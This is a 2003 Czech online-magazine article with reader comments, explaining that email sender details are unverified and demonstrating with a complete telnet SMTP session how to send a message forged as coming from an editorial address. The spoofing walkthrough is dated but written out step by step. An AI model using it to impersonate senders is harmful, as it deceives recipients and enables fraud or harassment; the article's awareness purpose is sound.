.

Nevěřte všemu, co vidíte! aneb Ne každý e-mail je tím, čím se zdá být…

Cestování

Nevěřte všemu, co vidíte! aneb Ne každý e-mail je tím, čím se zdá být…

Elektronická komunikace se pomalu ale jistě stává součástí běžného života všech lidí bez rozdílu národnosti, vzdělání či věku. Svět se i díky ní scvrknul na malou mýtinku, na níž k sobě máme všichni tak nádherně blízko. Ne všichni si však uvědomují, že na tohle blízko koukáme do značné míry růžovými brýlemi, které nám nasazují výrobci softwaru, aby nás přesvědčili, jak skvělý a inteligentní je právě ten jejich pohled. Ostatně, právě takhle to přece máme rádi, že? Skutečný svět je ale mnohem prozaičtější a naše růžové vidění nahrává všem těm, kteří více či méně rádi zneužívají naší blažené nevědomosti. Následující příspěvek je určen především těm z vás, kteří chcete alespoň na chvilku nadzvednout barevná sklíčka a pohlédnout reálnému světu přímo do očí. Posvítíme si zde na jednu zcela konkrétní vlastnost e-mailu, která způsobila zmatek už v nejedné hlavě. Ještě před tím si ale uveďme pár základních informací.
E-mail jako takový není nic jiného než text s určitou strukturou, který se předá jistému programu (tzv. MTA - Mail Transfer Agent) a ten zajistí jeho odeslání a vůbec všechny ostatní věci, které s tím souvisí. Běžný uživatel má ale rád komfort a ten mu zajistí zprostředkovatelský program (tzv. MUA - Mail User Agent), s jehož pomocí lze jednoduše napsat a vyklikat vše potřebné, ale zároveň nejvýše to, co pro něj připravili autoři příslušného programu. Mezi MUA patří MS Outlook Express a spousta jemu podobných programů. MTA běží na serverech, které se v nastavení MUA označují jako tzv. „SMTP servery". Vtip je v tom, že ani jeden výše popsaný typ programů nekontroluje (ani nemůže kontrolovat) údaje, které mu předhodíte, a tak není problém jim „nabulíkovat" cokoliv. Většinu běžných uživatelů lze velmi lehce uvést v omyl třeba už i „zfalšováním" údajů (jméno, vlastní e-mailová adresa,...) v Outlooku, ale to se většinou dá lehce odhalit. Pojďme si proto ukázat názorný příklad, jak zfalšovat údaje takovým způsobem, aby jejich odhalení bylo přinejmenším obtížné.
Představme si situaci, kdy chceme napsat řekněme jako redakce@muz-out.cz na adresu řekněme pepa@muz-out.cz něco velmi nehezkého. V tom případě stačí, když se připojíme na internet a v nastavení Outlooku se podíváme na adresu SMTP serveru (např. smtp.iol.cz). Potom si v nabídce Start/Programy najdeme "příkazový řádek" a spustíme ho. Otevře se černé okno očekávající naše příkazy. My zadáme pouze "telnet jmeno.smtp.serveru 25", třeba: telnet smtp.iol.cz 25
Tím vyzveme příslušný MTA ke spolupráci, kterou on s největší pravděpodobností potvrdí hláškou podobnou téhle:
Trying 194.228.2.71...
Connected to smtp.iol.cz.
Escape character is '^]'.
220 smtp-out1.iol.cz ESMTP server (Internet on Line)
Vy ho jako slušně pozdravíte a představíte se třeba jako váš oblíbený internetový server www.seznam.cz. Napíšete:
helo www.seznam.cz
Načež se vám ještě jednou představí i server:
250 smtp-out2.iol.cz
Potom požádáte o odeslání pošty a identifikujete se (samozřejmě podvrženě):
mail from: redakce@muz-out.cz
Server vám odpoví:
250 Ok
Pak řeknete komu se má pošta odeslat:
rcpt to: pepa@muz-out.cz
A server na to:
250 Ok
Pak mu řeknete, že od teď mu budete zadávat nikoliv příkazy, ale samotnou zprávu:
data
On přitaká:
354 go ahead
Od teď stačí dodržet strukturu e-mailu. Nebudu vás zatěžovat složitostmi, ale když dodržíte zhruba níže uvedené, bude se adresát zaručeně divit:
Subject: Ukonceni spoluprace
Date: Wed, 15 Jan 2003 13:51:27 +0100
From: Redakce <redakce@muz-out.cz>
To: pepa@muz-out.cz
Content-Type: text/plain; charset=iso-8859-2
Content-Transfer-Encoding: 8bit
Vážený kolego, tímto vás žádáme, abyste vyklidil svůj elektronický prostor v naší redakci a neprodleně jej opustil.
Vaše bývalá redakce.
.
Podle samotné tečky na začátku posledního řádku server rozpozná konec zprávy a odešle ji, o čemž vás uvědomí sdělením podobným tomuto:
250 ok 1042632456 qp 2224
Vy mu poděkujete a požádáte o ukončení spolupráce:
quit
Server vám ještě zamává:
221 smtp-out2.iol.cz
Connection closed by foreign host.
...a je to.
Na adresu pepa@muz-out.cz přijde zcela korektní (byť podvržená) e-mailová zpráva, jejíž odhalení je i pro nadprůměrně znalého uživatele přinejmenším obtížné (nepochybuju, že zkušení informatici by nějaký jasný znak podvržení našli). Samozřejmě zpráva může ve skutečnosti přijít z jiné adresy někomu jinému a v jiném znění. Konkrétní ukázka není nijak důležitá. Důležité je pouze to, že jejím skutečným autorem může být program, cizí nebo i správný člověk. Může, ale nemusí. Proto e-mail nejde a nepůjde využívat při oficiálním kontaktu s úřady, proto je nutný elektronický podpis, proto vám vir může přijít „odkudkoliv", a proto byste měli být „In".

Michal

ps: Pro pořádek ještě dodejme, že výše uvedený příklad pravděpodobně funguje jenom v tom případě, že je váš počítač připojen k internetu přímo (telefonní či pevnou linkou, mikrovlnkou...). Rovněž ne každý SMTP server vám udělá všechno, co vám na očích uvidí (ovšem s tím, který máte uvedený v nastavení Outlooku to půjde určitě) a jeho hlášky se můžou lišit.
   
17.01.2003 - Zahraničí - autor: Odborný článek

Komentáře:

  1. avatar
    [35] amidala [*]

    nadinka: no to jsem moc ráda..já také ne a doufám,že se bez podvrhovaných mailů obejdu.

    superkarma: 0 18.01.2003, 22:27:23
  2. avatar
    [33] aninas [*]

    miXal: prichazi mi hodne e-mailu a ja uz bezpecne poznam, ktery je od skutecneho odesilatele a ktery od fingovaneho. Napr. mi chodi spousty e-mailu od "mili". Tuhle dobrou dusi znam, tudiz bych mela byt presvedcena, ze ty maily jsou od ni. A ja vim, ze nejsou, i kdyz se tak tvari. Samozrejme jsou zavirovane. Dale pak zcela urcite chodi viry z e-mailu romana.velcovska@ecn.cz [a nejenom mne] a verim, ze pokud takova osoba s timto e-mailem existuje, tak o tom nema ani tuseni. Ten vir je I.Worm.Klez.e
    Pisu to jako laik, tak snad je to srozumitelne.
    Jinak na 100% vim, ze clovek, o kterem jsem pred nedavnem psala ve svem clanku, zcela zamerne a uvazene rozesila viry a kazdou e-mail adresu, ktera se mu dostane do ruky. To, ze lze z jeho PC odeslat nekomu e-mail, ktery vypada, ze jej odeslal nekdo uplne jiny, nam predvedl pred nekolika mesici. A ten, ktery byl "jako" tim odesilatelem mohl jenom smutne prihlizet, co se to deje, nez jsme pochopili, ze to on nedela.

    superkarma: 0 17.01.2003, 18:07:57
  3. avatar
    [25] Acinka [*]

    No přečetla jsem si příspěvky od tomáše a miWala a připadala sem si, jak když se svým přítelem jdeme pokecat do hospůdky s jeho spolupracovníkama to jsou samý zkratky, cizí slova ....

    superkarma: 0 17.01.2003, 13:33:42
  4. [19] Zuzanicka [*]

    Nerozumím tomu ani špínu za nehtem,složitěj ti již napsat asi nešlo

    superkarma: 0 17.01.2003, 11:24:12
  5. avatar
    [15] Clerenc [*]

    To je spanelska vesnice Jenom by me zajimalo, kdo si tento navod vezme k srdci

    superkarma: 0 17.01.2003, 10:48:33
  6. avatar
    [14] Kremzina [*]

    Je nějaký podstatný rozdil v zabezpečení mezi Outlook Expresem a tzv. velkým Outlookem, který je součastí Office. Jsem lépe zabezpečená, když mám sice připojení vzduchem, ale PC je za firewalem? Díky moc za odpovědi.

    superkarma: 0 17.01.2003, 10:10:17
  7. avatar
    [12] medved [*]

    ja ne panimaju pa cinsky

    superkarma: 0 17.01.2003, 09:39:31
  8. avatar
    [11] medved [*]

    ja ne paminaju pa cinsky

    superkarma: 0 17.01.2003, 09:39:20
  9. avatar
    [9] Silveig [*]

    sice tomu moc nerozumím :)) ale je to pěknýýý , někdy se to může hodit

    superkarma: 0 17.01.2003, 09:26:48
  10. avatar
    [8] Acinka [*]

    No to je fakt hustý Můj přítel dělá taky do PC a programování .... a už sem od něj slyšela pár takovýhle věcí, který se dají udělat Třeba svůj PC přesvědčoval, že nemá jednu čtečku na CD, ale dvě (což nebyla pravda), každý večer kouká, jestli se mu někdo nechtěl nabořit na jeho PC, no prostě to sou věci

    superkarma: 0 17.01.2003, 09:13:39
  11. avatar
    [6] Léthé [*]

    superkarma: 0 17.01.2003, 08:51:11
  12. avatar
    [5] Irena1 [*]

    Hmm, jsem zvědavá, kolik lidí si teď tenhle váš návod rádo vyzkouší...

    superkarma: 0 17.01.2003, 08:24:20
  13. avatar
    [2] aninas [*]

    Zajimave a pro zenu, uzivatelku Inetu
    Jinak o Outlook Express jsem slysela, ze je nevice zavirovatelny a nejvice se na nem daji delat neplechy . A co jine - samostatne postovni programy? MSN,Bat, Hotmail ...?

    superkarma: 0 17.01.2003, 07:37:05
  14. avatar
    [1] kosmokosmo [*]

    superkarma: 0 17.01.2003, 00:13:47

Profil uživatele




Registrace nového uživatele | Zaslat heslo

Komerční tipy

Novinky

Dnešní vydání

Nové v rubrice

Nejčtenější články

Poslední komentáře

Fotogalerie

Partner rubriky

Ankety

Náš tip

Doporučujeme